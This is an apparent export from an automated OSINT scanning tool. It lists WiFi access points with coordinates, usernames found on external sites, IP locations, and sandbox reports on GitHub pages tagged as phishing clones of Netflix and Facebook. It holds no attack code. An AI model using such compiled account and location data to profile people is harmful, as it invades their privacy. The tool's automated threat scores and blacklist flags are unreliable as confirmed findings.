1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "_7ADE9AE2-7FFB-11ED-B877-0800273CFE14_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFE051EBAAF9DBCA61.TMP" has type "data"- Location: [%TEMP%\\~DFE051EBAAF9DBCA61.TMP]- [targetUID: 00000000-00002796]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00002800]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002796]\n "Cab87C2.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab87C2.tmp]- [targetUID: 00000000-00002800]\n "YXLLLO20.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YXLLLO20.txt]- [targetUID: 00000000-00002796]\n "index_1_.webmanifest" has type "JSON data"- [targetUID: N/A]\n "~DF19808A043737268F.TMP" has type "data"- Location: [%TEMP%\\~DF19808A043737268F.TMP]- [targetUID: 00000000-00002796]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002800]\n "4WUOR0VH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4WUOR0VH.txt]- [targetUID: 00000000-00002796]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /index.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: zacharyburdette.com\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 200 OK\nAccept-Ranges: bytes\nAge: 0\nCache-Control: public, max-age=0, must-revalidate\nContent-Length: 414\nContent-Type: application/octet-stream\nDate: Tue, 20 Dec 2022 00:38:53 GMT\nEtag: "bd262ffded8f9193645cf1963d01292c-ssl"\nServer: Netlify\nStrict-Transport-Security: max-age=31536000\nX-Nf-Request-Id: 01GMPFG4NQP1Z3ZF5C2ANP2MND\n\n{\n "name": "Zachary Burdette",\n "short_name": "Zachary Burdette",\n "lang": "en-us",\n "theme_color": "#2962ff",\n "background_color": "#2962ff",\n "icons": [{\n "src": "img/icon-192.png",\n "sizes": "192x192",\n "type": "image/png"\n }, {\n "src": "img/icon-512.png",\n "sizes": "512x512",\n "type": "image/png"\n }],\n "display": "standalone",\n "start_url": "/?utm_source=web_app_manifest"\n}"\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: zacharyburdette.com\nDNT: 1\nConnection: Keep-Alive"\n | 35.229.48.116 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qVGOB1rQJjQIM8j8t5Spm5SzuRznIdJDuYO5Jbpn3fZk%2BJxIqln47OJIYIKFh9H9g0ehIc6QmUjGxpPhNXDavBCNcEEJOQv%2BvWtEqWQkF532xy%2FfGHFy%2BS9fyHqoDn0%3D"}],"group":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=qVGOB1rQJjQIM8j8t5Spm5SzuRznIdJDuYO5Jbpn3fZk%2BJxIqln47OJIYIKFh9H9g0ehIc6QmUjGxpPhNXDavBCNcEEJOQv%2BvWtEqWQkF532xy%2FfGHFy%2BS9fyHqoDn0%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6071cb5443bc-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SX55154A43F (Net ID: 00:01:E3:54:A4:3F) | 50.8897, 6.0563 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:F7:35:6D) | 41.8781, -87.6298 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | LCPSSTAFF (Net ID: 00:0B:85:50:7F:91) | 39.0469, -77.4903 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | likeevideo (Category: social)
https://likee.video/@login | login |
| 2023-05-12 03:11:17 | Physical Location | No | AbstractAPI | 1 | 0 | 2 | 0 | None | Amsterdam, North Holland, 1012, Netherlands, Europe | 188.114.96.1 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | MCUUID (Minecraft) (Category: gaming)
https://mcuuid.net/?q=ayshoo | ayshoo |
| 2023-05-12 02:53:18 | Internet Name | No | Mnemonic PassiveDNS | 25 | 0 | 1 | 0 | None | www.ayhu.xyz | ayhu.xyz |
| 2023-05-12 03:01:20 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.182): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:50:42 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://wasimreja.github.io/netflix-clone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_9f0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2544"\n "IsoScope_9f0_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_9f0_IESQMMUTEX_0_303"\n "IsoScope_9f0_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_9f0_IE_EarlyTabStart_0xb04_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "UpdatingNewTabPageData"\n "IsoScope_9f0_ConnHashTable<2544>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "104.18.22.52:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"pro.fontawesome.com"\n "wasimreja.github.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced" and extension "png"\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "fa-light-300_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Light family"- [targetUID: N/A]\n "fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Regular family"- [targetUID: N/A]\n "background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Solid family"- [targetUID: N/A]\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "all_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "~DFCE77C216766EB7B9.TMP" has type "data"- Location: [%TEMP%\\~DFCE77C216766EB7B9.TMP]- [targetUID: 00000000-00002544]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002544]\n "~DF3D8E8EB511650354.TMP" has type "data"- Location: [%TEMP%\\~DF3D8E8EB511650354.TMP]- [targetUID: 00000000-00002544]\n "~DFA1B02EDDB3740F24.TMP" has type "data"- Location: [%TEMP%\\~DFA1B02EDDB3740F24.TMP]- [targetUID: 00000000-00002544]\n "~DF047AF5B01B1C6397.TMP" has type "data"- Location: [%TEMP%\\~DF047AF5B01B1C6397.TMP]- [targetUID: 00000000-00002544]\n "~DF9CAF8A24CDDF2A4D.TMP" has type "data"- Location: [%TEMP%\\~DF9CAF8A24CDDF2A4D.TMP]- [targetUID: 00000000-00002544]\n "urlref_httpswasimreja.github.ionetflix-clone" has type "HTML document ASCII text"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "RecoveryStore._D7A145BF-EF99-11ED-9F88-080027F31822_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "style_1_.css" has type "assembler source ASCII text"- [targetUID: N/A]\n "_7763E692-EF9A-11ED-9F88-080027F31822_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_D7A145C1-EF99-11ED-9F88-080027F31822_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_DFBE3414-EF99-11ED-9F88-080027F31822_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "T6P1ZC01.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\T6P1ZC01.txt]- [targetUID: 00000000-00002544]\n "main_1_.js" has type "ASCII text"- [targetUID: N/A]\n "WTGINOBI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\WTGINOBI.txt]- [targetUID: 00000000-00002544]\n "SAL9KSU0.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SAL9KSU0.txt]- [targetUID: 00000000-00002544]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "Z1J5GHXQ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\Z1J5GHXQ.txt]- [targetUID: 00000000-00002544]\n "SC9MWSRS.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SC9MWSRS.txt]- [targetUID: 00000000-00002544]\n "9RPMKK4K.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\9RPMKK4K.txt]- [targetUID: 00000000-00002544]\n "31LPVZHQ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\31LPVZHQ.txt]- [targetUID: 00000000-00002544]\n "netflix-clone_1_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://wasimreja.github.io/netflix-clone/"\n Pattern match: "https://wasimreja.github.io"\n Pattern match: "https://wasimreja.github.io/netflix-clone"\n Pattern match: "http://www.w3.org/1999/02/22-rdf-syntax-ns#"\n Pattern match: "mzjdL.VS/oLORCm/~H.c0KNw&FGk~Z2C3[f"\n Pattern match: "https://pro.fontawesome.com/releases/v5.10.0/css/all.css"\n Pattern match: "SUIDmicrosoft.com/921645190899231032348364844117031032230MUID02E5F61DC6DE605D1B1AE513C75A6147microsoft.com/102558439820831110702364859742031032230_EDGE_Vmicrosoft.com/921658439820831110702364875367031032230SRCHDAF=NOFORMmicrosoft.com/1024332378944031085610"\n Pattern match: "SUIDmicrosoft.com/921645190899231032348364844117031032230MUID02E5F61DC6DE605D1B1AE513C75A6147microsoft.com/102558439820831110702364859742031032230SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD"\n Pattern match: "SUIDmicrosoft.com/921645190899231032348364844117031032230SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743SRCHUSRDOB=20220131mic"\n Pattern match: "921659439820831110702365172242031032230MUID253BEC97DCC5678D3BB0FF99DD89661Dmsn.com/102559439820831110702365172242031032230"\n Pattern match: "MUIDB02E5F61DC6DE605D1B1AE513C75A6147ieonline.microsoft.com/921658439820831110702364859742031 | 185.199.108.153 |
| 2023-05-12 03:32:40 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.20:80 | 188.114.97.0/24 |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.183): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:47:17 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://rakha360.github.io/facebook', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://rakha360.github.io/facebook', u'type': u'submitted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://rakha360.github.io/facebook', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"kit.fontawesome.com"\n "rakha360.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:80"\n "185.199.111.153:443"\n "104.18.22.52:443"\n "172.64.169.22:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"rakha360.github.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_9c4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_9c4_IESQMMUTEX_0_303"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_9c4_IESQMMUTEX_0_519"\n "IsoScope_9c4_IE_EarlyTabStart_0xb00_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2500"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_9c4_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_9c4_ConnHashTable<2500>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "facebook_1_.htm" has type "HTML document UTF-8 Unicode text with CRLF line terminators"- [targetUID: N/A]\n "free-v4-font-face.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "_2E56694C-B34B-11ED-9FE5-0800270497D3_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 180 x 45 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 2 icons 32x32 32 bits/pixel 16x16 32 bits/pixel"- [targetUID: N/A]\n "facebook_1_.htm" has type "HTML document ASCII text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DF38C0E91F31DE9AC8.TMP" has type "data"- Location: [%TEMP%\\~DF38C0E91F31DE9AC8.TMP]- [targetUID: 00000000-00002500]\n "~DFBFD127F7C6B8EB92.TMP" has type "data"- Location: [%TEMP%\\~DFBFD127F7C6B8EB92.TMP]- [targetUID: 00000000-00002500]\n "RecoveryStore._CE31769F-B348-11ED-9FE5-0800270497D3_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002500]\n "R9LTVOO7.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\R9LTVOO7.txt]- [targetUID: 00000000-00002500]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00002500]\n "~DF5A4B20CAF7FF8423.TMP" has type "data"- Location: [%TEMP%\\~DF5A4B20CAF7FF8423.TMP]- [targetUID: 00000000-00002500]\n "~DF1E20889D13C0AA85.TMP" has type "data"- Location: [%TEMP%\\~DF1E20889D13C0AA85.TMP]- [targetUID: 00000000-00002500]\n "free-v4-shims.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /facebook HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: rakha360.github.io"\n "GET /facebook/ HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: rakha360.github.io"\n "HTTP/1.1 301 Moved Permanently\nConnection: keep-alive\nContent-Length: 162\nServer: GitHub.com\nContent-Type: text/html\npermissions-policy: interest-cohort=()\nLocation: https://rakha360.github.io/facebook/\nX-GitHub-Request-Id: B05E:70FD:4CDC77:57E341:63F715D2\nAccept-Ranges: bytes\nDate: Thu, 23 Feb 2023 07:44:21 GMT\nVia: 1.1 varnish\nAge: 900\nX-Served-By: cache-sjc10044-SJC\nX-Cache: HIT\nX-Cache-Hits: 1\nX-Timer: S1677138262.911903,VS0,VE1\nVary: Accept-Encoding\nX-Fastly-Request-ID: 20236c9c777600e56880cbbcc15a8ab66019f0d5"\n "<html>\n<head><title>301 Moved Permanently</title></head>\n<body>\n<center><h1>301 Moved Permanently</h1></center>\n<hr><center>nginx</center>\n</body>\n</html>"\n "GET /facebook/style.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://rakha360.github.io/facebook/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rakha360.github.io\nDNT: 1\nConnection: Keep-Alive"\n "GET /facebook/img/logo.png HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://rakha360.github.io/facebook/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rakha360.github.io\nDNT: 1\nConnection: Keep-Alive"\n "GET /facebook/img/mobile.png HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://rakha360.github.io/facebook/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rakha360.github.io\nDNT: 1\nConnection: Keep-Alive"\n "GET /facebook/responsive.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://rakha360.github.io/facebook/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rakha360.github.io\nDNT: 1\nConnection: Keep-Alive"\n "XIo8>\'@@Dy\nzpsAPmqBDI!%"\'%31Z$>{/EdkotWQ./j-dE_,=G)kHt#qy9*wu+njPz(z>~(+t3[fJ<Y{x4Ro""f.5CG4a~>Ib4&eNlOqc?2GCOgG"?.=qZ;T+`rH&#DKDbSGpfmBn1X8a"b0fm;tTC|*Pt\nq;rDn5LUEgPggoebU3F:D\\1L@V#tcKui_EU2IG0F0k\ncQJ(Ul\ni](Dpn;6\nJY L4^STr?J:kB\'lYyY3\n \nde*z]@91U+r950 0/@\'!Q|vCz\\}nTAR9,<r.26R:inuHCrsKmwg\nwt4N9+I]u%8giXs,kXcuhy1QdZ1iu<R=&jim)kon"!&NvZJ$[@&lvc@^T3VM.d|m8Y0?L84\n/FFfE=!E)(J\\~`63jZ2lhj|8;lQ;Q:sFj bJTZ1\'rT\'vxNMs;n6$6{Nx-|&Ww9c6@n92$OJ|&K,?^IN_v!)xbR^si\nVf6Pdn_5h-5:q(fQs! s{4$s6a"CFs/2S`[XLLeHuidOmz\'~}brTOmX7\nD;``UU}4v`X/f*9c?I-*Y^Q^?)}[|sw;w$wq9n_mCI(d", "RgjT\'k\\ZZhT>$$q;bQJJDmEPw\n})iGD;OrT0T.zs{>p{8P\n+GfUS;UL-`G\nzu?9Fs_:sY*gv>uI?cY", "Zn6>@QM*q(v7&h9\\i,Hv@qK4/}v-$Ai`-3ho=9Ah;?]{L`__!:(>rJcRq~J:hm((8L;](2A\\*0$5DQ0%]GK"AvIxh:AjIpR%`jLAj=)Q]2LaIE#@>`ISzG@\n=TX(jMlX)OSrL"<|oI)%bU)2$7=Y L}x^v_+1s!)YS9*T_|Q3O@xi3aB :nJXr\n/ T:/ 